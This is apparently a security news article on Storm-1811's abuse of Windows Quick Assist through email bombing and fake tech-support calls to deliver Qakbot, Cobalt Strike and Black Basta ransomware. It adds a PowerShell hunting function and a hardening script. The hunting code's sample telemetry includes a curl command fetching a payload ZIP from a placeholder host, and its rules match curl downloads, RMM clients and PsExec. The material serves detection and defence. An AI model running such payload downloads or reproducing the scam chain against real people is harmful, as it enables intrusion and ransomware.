Microsoft has been investigating a campaign where financially motivated cybercriminals abuse the Windows Quick Assist feature to deploy Black Basta ransomware on victims’ networks. The threat group, identified as Storm-1811, initiates their attacks by overwhelming targets with a flood of unsolicited emails, a tactic known as email bombing. This campaign has been under scrutiny since at least mid-April 2024.
Email Bombing and Voice Phishing Tactics
The attackers begin by subscribing the victim’s email address to various services, causing their inboxes to be inundated with spam. Subsequently, the threat actors impersonate Microsoft technical support or the victim’s company’s IT staff, contacting the targets by phone to offer assistance in resolving the spam issue. During these voice phishing calls, the attackers persuade the victims to grant them access to their Windows devices via the Quick Assist remote control and screen-sharing tool.
Since mid-April 2024, Microsoft Threat Intelligence has observed the threat actor Storm-1811 misusing the client management tool Quick Assist to target users in social engineering attacks that lead to Black Basta ransomware. https://t.co/PA5dW6alnQ
— Microsoft Threat Intelligence (@MsftSecIntel) May 15, 2024
Once access is granted, the attackers execute a scripted cURL command to download malicious batch or ZIP files. According to Microsoft, these files often lead to the installation of Qakbot, remote monitoring and management (RMM) tools like ScreenConnect and NetSupport Manager, and the Cobalt Strike penetration testing toolkit. After the phone call, Storm-1811 conducts domain enumeration and lateral movement within the victim’s network, ultimately deploying the Black Basta ransomware using the Windows PsExec tool.
Cybersecurity firm Rapid7 has also observed these attacks, noting that the attackers use batch scripts to harvest the victim’s credentials via PowerShell commands. These credentials are collected under the pretense of requiring a login for an update and are immediately exfiltrated to the attackers’ server using Secure Copy Protocol (SCP). In some cases, credentials are saved to an archive for manual retrieval.
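A hunting helper for the chain just described (Quick Assist session, curl download of a batch or ZIP file, RMM client, PsExec lateral movement), added here as an example rather than code from Microsoft's or Rapid7's reports. It assumes process-creation telemetry exported as objects with the fields Host, TimeCreated, Image, ParentImage and CommandLine; the RMM client binary names are assumptions for the tools named above, and the sample records are constructed.

```powershell
# Added example, not code from Microsoft's or Rapid7's reports. It scans process-creation
# records (for instance Sysmon Event ID 1 exported as objects) for the chain described
# above: a Quick Assist session, then curl.exe fetching a .bat/.zip, then an RMM client
# on the same host, then PsExec-launched processes anywhere in the environment. The
# field names (Host, TimeCreated, Image, ParentImage, CommandLine) are assumptions.
function Find-QuickAssistAbuse {
    param([Parameter(Mandatory)][object[]]$Events)
    # Assumed client binary names for the RMM tools named in the report (ScreenConnect, NetSupport).
    $rmmClients  = @('screenconnect.clientservice.exe', 'client32.exe')
    $qaStart     = @{}     # host -> time of the first QuickAssist.exe launch on that host
    $qaFirstAny  = $null   # earliest Quick Assist launch seen on any host
    $findings    = @()
    foreach ($e in ($Events | Sort-Object TimeCreated)) {
        $image  = ([IO.Path]::GetFileName([string]$e.Image)).ToLower()
        $parent = ([IO.Path]::GetFileName([string]$e.ParentImage)).ToLower()
        if ($image -eq 'quickassist.exe') {
            if (-not $qaStart.ContainsKey($e.Host)) { $qaStart[$e.Host] = $e.TimeCreated }
            if ($null -eq $qaFirstAny) { $qaFirstAny = $e.TimeCreated }
            continue
        }
        $afterLocalQa = $qaStart.ContainsKey($e.Host) -and $e.TimeCreated -ge $qaStart[$e.Host]
        $afterAnyQa   = ($null -ne $qaFirstAny) -and $e.TimeCreated -ge $qaFirstAny
        $rule = $null
        if ($afterLocalQa -and $image -eq 'curl.exe' -and $e.CommandLine -match 'https?://\S+\.(bat|zip)(\s|$)') {
            $rule = 'CurlPayloadDownloadAfterQuickAssist'        # scripted cURL download of .bat/.zip
        } elseif ($afterLocalQa -and $rmmClients -contains $image) {
            $rule = 'RmmClientAfterQuickAssist'                  # ScreenConnect / NetSupport persistence
        } elseif ($afterAnyQa -and ($parent -eq 'psexesvc.exe' -or $image -eq 'psexec.exe')) {
            $rule = 'PsExecAfterQuickAssistInEnvironment'        # lateral movement / ransomware deployment
        }
        if ($rule) {
            $findings += [pscustomobject]@{ Host = $e.Host; Time = $e.TimeCreated; Rule = $rule
                                           Image = $image; CommandLine = $e.CommandLine }
        }
    }
    return $findings
}

# Constructed sample telemetry (paths and URLs are placeholders, not real indicators).
$sample = @(
    [pscustomobject]@{ Host='WS01';  TimeCreated=[datetime]'2024-05-01T10:00:00'; Image='C:\Windows\System32\QuickAssist.exe'; ParentImage='C:\Windows\explorer.exe';     CommandLine='QuickAssist.exe' }
    [pscustomobject]@{ Host='WS01';  TimeCreated=[datetime]'2024-05-01T10:04:00'; Image='C:\Windows\System32\curl.exe';       ParentImage='C:\Windows\System32\cmd.exe'; CommandLine='curl -o C:\Users\Public\u.zip https://example.invalid/update.zip' }
    [pscustomobject]@{ Host='WS01';  TimeCreated=[datetime]'2024-05-01T10:09:00'; Image='C:\ProgramData\NetSupport\client32.exe'; ParentImage='C:\Windows\System32\cmd.exe'; CommandLine='client32.exe' }
    [pscustomobject]@{ Host='SRV02'; TimeCreated=[datetime]'2024-05-01T11:30:00'; Image='C:\Windows\System32\cmd.exe';        ParentImage='C:\Windows\PSEXESVC.exe';     CommandLine='cmd /c deploy.bat' }
    [pscustomobject]@{ Host='WS07';  TimeCreated=[datetime]'2024-05-01T09:00:00'; Image='C:\Windows\System32\curl.exe';       ParentImage='C:\Windows\System32\cmd.exe'; CommandLine='curl https://example.invalid/tool.zip' }
)
Find-QuickAssistAbuse -Events $sample | Format-Table -AutoSize
```

The curl and RMM rules are correlated per host, while the PsExec rule only requires that a Quick Assist session was seen earlier anywhere, since the report places PsExec in the lateral-movement phase on other machines; the WS07 download predates any session and is therefore not flagged.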
Mitigation and Recommendations
To mitigate these social engineering attacks, Microsoft advises network defenders to block or uninstall Quick Assist and similar RMM tools if they are not in use. Employees should be trained to recognize tech support scams, and connections should only be allowed if initiated by the user contacting IT support or Microsoft Support. Any suspicious Quick Assist sessions should be terminated immediately.
Microsoft recommends the following best practices to protect users and organizations from attacks and threat actors that misuse Quick Assist:
- “Consider blocking or uninstalling Quick Assist and other remote monitoring and management tools if these tools are not in use in your environment. If your organization utilizes another remote support tool such as Remote Help, block or remove Quick Assist as a best practice. Remote Help is part of the Microsoft Intune Suite and provides authentication and security controls for helpdesk connections.
- Educate users about protecting themselves from tech support scams. Tech support scams are an industry-wide issue where scammers use scary tactics to trick users into unnecessary technical support services.
- Only allow a helper to connect to your device using Quick Assist if you initiated the interaction by contacting Microsoft Support or your IT support staff directly. Don’t provide access to anyone claiming to have an urgent need to access your device.
- If you suspect that the person connecting to your device is conducting malicious activity, disconnect from the session immediately and report to your local authorities and/or any relevant IT members within your organization.
- Users who have been affected by a tech support scam can also use the Microsoft technical support scam form to report it.”
The Black Basta ransomware group emerged as a Ransomware-as-a-Service (RaaS) operation in April 2022, following the disbandment of the Conti cybercrime group. Since then, Black Basta affiliates have targeted numerous high-profile organizations.
Quick Assist and How It Is Abused
Quick Assist is an application that enables a user to share their Windows or macOS device with another person over a remote connection. The helper can then view the sharer’s display, make annotations, or take full control of the device, typically for troubleshooting. The attacks described here exploit no flaw in the tool itself; they rely on the victim voluntarily granting that control.
In addition to protecting customers from observed malicious activity, Microsoft is investigating the use of Quick Assist in these attacks and is working on improving the transparency and trust between helpers and sharers, and incorporating warning messages in Quick Assist to alert users about possible tech support scams.
Microsoft Defender’s Role
Microsoft Defender for Endpoint detects components of activity originating from Quick Assist sessions as well as follow-on activity, and Microsoft Defender Antivirus detects the malware components associated with this activity. Quick Assist is installed by default on devices running Windows 11. Additionally, tech support scams are an industry-wide issue where scammers use scare tactics to trick users into unnecessary technical support services.
Qakbot and RMM Tools
Qakbot has been used over the years as a remote access vector to deliver additional malicious payloads that led to ransomware deployment. In this recent activity, Qakbot was used to deliver a Cobalt Strike Beacon attributed to Storm-1811. ScreenConnect was used to establish persistence and conduct lateral movement within the compromised environment. NetSupport Manager is a remote access tool used by multiple threat actors to maintain control over compromised devices. An attacker might use this tool to remotely access the device, download and install additional malware, and launch arbitrary commands.
Further Mitigations
Microsoft recommends the following mitigations to reduce the impact of this threat:
- “Educate users about protecting personal and business information in social media, filtering unsolicited communication, identifying lure links in phishing emails, and reporting reconnaissance attempts and other suspicious activity.
- Educate users about preventing malware infections, such as ignoring or deleting unsolicited and unexpected emails or attachments sent through instant messaging applications or social networks as well as suspicious phone calls.
- Invest in advanced anti-phishing solutions that monitor incoming emails and visited websites. Microsoft Defender for Office 365 brings together incident and alert management across email, devices, and identities, centralizing investigations for email-based threats.
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.
- Enable network protection to prevent applications or users from accessing malicious domains and other malicious content on the internet.
- Turn on tamper protection features to prevent attackers from stopping security services.
- Enable investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Refer to Microsoft’s human-operated ransomware overview for general hardening recommendations against ransomware attacks.”
Detection and Alerts
Microsoft Defender XDR customers can turn on attack surface reduction rules to prevent common attack techniques:
- Block executable files from running unless they meet a prevalence, age, or trusted list criterion
- Block execution of potentially obfuscated scripts
- Block process creations originating from PSExec and WMI commands
- Use advanced protection against ransomware
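The Quick Assist removal from the first recommendation list, the cloud-delivered and network protection settings from the further mitigations, and the four ASR rules just listed, combined into one elevated PowerShell script. This is an added example, not Microsoft's own code; the capability and Store package names for Quick Assist and the ASR rule GUIDs are the published identifiers, and tamper protection is not set here because it is managed through Intune or Windows Security rather than these cmdlets.

```powershell
# Added example, not code from Microsoft's report. Run in an elevated PowerShell on a
# Windows 11 endpoint. It (1) reports and optionally removes Quick Assist, which ships as a
# Windows capability and, on newer builds, as a Store package, (2) turns on cloud-delivered
# and network protection, and (3) enables the four ASR rules listed above by GUID.
# Cloud-delivered protection is enabled first because the prevalence/age/trusted-list
# rule depends on it.
param([switch]$RemoveQuickAssist)

# 1. Quick Assist inventory and optional removal
$cap = Get-WindowsCapability -Online | Where-Object Name -like 'App.Support.QuickAssist*'
$pkg = Get-AppxPackage -AllUsers -Name 'MicrosoftCorporationII.QuickAssist' -ErrorAction SilentlyContinue
foreach ($c in $cap) { "Capability $($c.Name): $($c.State)" }
foreach ($p in $pkg) { "Store package installed: $($p.PackageFullName)" }
if ($RemoveQuickAssist) {
    $cap | Where-Object State -eq 'Installed' | ForEach-Object { Remove-WindowsCapability -Online -Name $_.Name | Out-Null }
    $pkg | Remove-AppxPackage -AllUsers
}

# 2. Defender settings from the mitigation list
Set-MpPreference -MAPSReporting Advanced              # cloud-delivered protection
Set-MpPreference -EnableNetworkProtection Enabled     # block access to malicious domains

# 3. Attack surface reduction rules named in the report (rule name -> GUID).
#    Test the PSExec/WMI rule first where Configuration Manager clients are managed,
#    since that rule is documented as incompatible with them.
$asrRules = [ordered]@{
    'Block executable files unless they meet a prevalence, age, or trusted list criterion' = '01443614-cd74-433a-b99e-2ecdc07bfc25'
    'Block execution of potentially obfuscated scripts'                                    = '5beb7efe-fd9a-4556-801d-275e5ffc04cc'
    'Block process creations originating from PSExec and WMI commands'                    = 'd1e49aac-8f56-4280-b9ba-993a6d77406c'
    'Use advanced protection against ransomware'                                           = 'c1db55ab-c21a-4637-bb3f-a12568109d35'
}
foreach ($rule in $asrRules.GetEnumerator()) {
    Add-MpPreference -AttackSurfaceReductionRules_Ids $rule.Value -AttackSurfaceReductionRules_Actions Enabled
    "Enabled ASR rule: $($rule.Key)"
}

# Verify the resulting state
$pref = Get-MpPreference
"Network protection: $($pref.EnableNetworkProtection)"
"ASR rule ids: $($pref.AttackSurfaceReductionRules_Ids -join ', ')"
```

Use `-AttackSurfaceReductionRules_Actions AuditMode` instead of `Enabled` for a rollout phase, and review the ASR events in Defender before switching to block.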
Malware Detection
Microsoft Defender Antivirus detects Qakbot downloaders, implants, and behavior as the following malware:
- TrojanDownloader:O97M/Qakbot
- Trojan:Win32/QBot
- Trojan:Win32/Qakbot
- TrojanSpy:Win32/Qakbot
- Behavior:Win32/Qakbot
Black Basta threat components are detected as the following:
- Behavior:Win32/Basta
- Ransom:Win32/Basta
- Trojan:Win32/Basta
Microsoft Defender Antivirus detects Beacon running on a victim process as the following:
- Behavior:Win32/CobaltStrike
- Backdoor:Win64/CobaltStrike
- HackTool:Win64/CobaltStrike
Additional Cobalt Strike components are detected as the following:
- TrojanDropper:PowerShell/Cobacis
- Trojan:Win64/TurtleLoader.CS
- Exploit:Win32/ShellCode
Last Updated on November 7, 2024 8:24 pm CET